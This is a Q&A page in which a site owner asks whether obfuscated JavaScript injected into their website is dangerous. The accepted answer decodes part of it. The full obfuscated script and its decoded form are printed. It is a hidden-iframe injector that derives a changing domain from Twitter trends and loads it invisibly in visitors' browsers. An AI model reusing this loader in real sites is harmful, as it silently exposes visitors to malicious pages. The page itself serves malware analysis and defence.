Is this dangerous javascript?

Question

Is this dangerous javascript?

<script> (function($$) { d = "(@(){ % H=@ ( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; % B=@ ( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery ;try{Pn=$ }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^az]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()# js@functionP #AV#n('X':'`','~.getUTC\\return .noConflict(true)}catch(e){} !#dP $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P"; for (c = 50; c; d = (t = d.split('#@PVX`~\\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop())); $$(d) })(function(jsAP) { return (function(jsA, jsAg) { return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)() })((function(jsA) { return jsA.constructor }), (function(jsA) { return (function(jsAg) { return jsA.call(jsA, jsAg) }) })) }); </script>

My host says nothing about this, and this happens often. I think they can hide a malicious hacking attempt.

What does it do?

EDIT:

We are changing hosts.

The code is really malicious and has been entered on our site. Our host tried to hide it (maybe so we don’t worry)

This happened to my friend site on the same host.

Do not test this script, please.

Looks like some confusing injection.

+4

javascript code-injection

Gray adams Nov 12 '11 at 15:56

source share

1 answer

Dave newton · Accepted Answer · 2011-11-12T16:39:24+0000

Let it work and decode it; it will be fun (-nish).

AFAICT so far, it captures (which seems to be) the third trend two days before the current date, or at least intended (I think the date key it uses to search for daily trends is incorrect, because it adds a zero second thing by time, which is not in the feed) by creating a URL from this and sending some data using a hash representing the nearest interval of 6 hours.

Here the blob of text is decoded after decoding along with the start of the analysis:

 (function () { jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary. /* Returns either first element of jsA, or a joined string. */ function firstElementOrJoined(jsA) { return jsA.length == 1 ? jsA[0] : jsA.join('') }; jsAj = document; loadJquery(); // Load JQ in head new script tag. function divideAndFloor(jsq, jsAB) { return Math.floor(jsq / jsAB) } function jsx(jss) { var jsAC = divideAndFloor(jsN, jsAm); var jsF = jsN % jsAm; var jsf = (jsAD * jsF) - (jsAT * jsAC); if (jsf > 0) { jsN = jsf } else { jsN = jsf + jsAv } return (jsN % jss) } /** Used only once in .getJSON call. */ function jst(jsk) { jsN = 2345678901 + jsk; jsAD = 48271; jsAv = 2147483647; jsAm = divideAndFloor(jsAv, jsAD); jsAT = jsAv % jsAD } /** Takes twitter as_of and subtracts ~2 days. */ function jse(jsA) { d = new Date(); d.setTime((jsA.as_of - 172800) * '1000'); return d } function jsz(jsAz) { var jsc, jsAL, jsj = jsAz.length; var jsv = []; while (--jsj) { jsAL = jsx(jsj); jsv.push(jsAL); jsc = jsAz[jsAL]; jsAz[jsAL] = jsAz[jsj]; jsAz[jsj] = jsc } } function jso($) { // Wait until we have jQuery loaded. if (typeof($) == 'undefined') { setTimeout(function () { jso(jQuery) }, 1222); return; } $(function () { // Only run this function once (there a timeout inside). if (typeof ($.jsAh) != 'undefined') return; $.jsAh = 1; $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) { dateTwoDaysPrior = jse(data); nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1; nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate(); urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo; twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1; jsAd = twoDigitPrevSixHr + 1; // Run JSON request every second. setTimeout(function () { $.getJSON(urlTwitterTwoDaysAgo, function (data) { try { jsy = data.trends; for (jsr in jsy) { break; } jsr = jsr.substr(0, 11); // == 2011-11-10 if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh // Try to get trends for last 6hr thing (but the :00 will make it never work?) // If can't, try to get the next 6hr thing. jsb = jsy[jsr + twoDigitPrevSixHr + ':00']; if (!jsb) jsb = jsy[jsr + jsAd + ':00']; // Get third trend entry, eg, // { // "name": "#sinterklaasintocht", // "query": "#sinterklaasintocht", // "promoted_content": null, // "events": null // } // and strip out non-chars from name, add safetynet, and convert to array // ['s', 'i', etc... nterklaasintochtsafetynet] jsb = (jsb[3].name.toLowerCase().replace(/[^az]/gi, '') + 'safetynet').split(''); // 803 + prevSixHr * 3 + 410; -- some sort of hash? hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41; jst(hashkeyForTwoDaysAgoPrevSixHr); jsa = jsx(4) + 10; jsz(jsb); // Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced. // jsb = ['s', 'i', etc... nterklaasintochtsafetynet] jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d'; jsAr['Z'] = jsg; // jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>'; $('body').append(jsAf) } catch (jsAy) {} }) }, 1000) }) }); } jso(jQuery) })();

Here are some urls built from an array:

 jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

This piece of code:

 jsAS = jsAj.getElementsByTagName(jsn('Y'))[0]; jsm = jsAj.createElement(jsn('kS')); jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj")); jsAS.appendChild(jsm)

adds jQuery script tag to <head> :

 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>

Is this dangerous javascript?

More articles: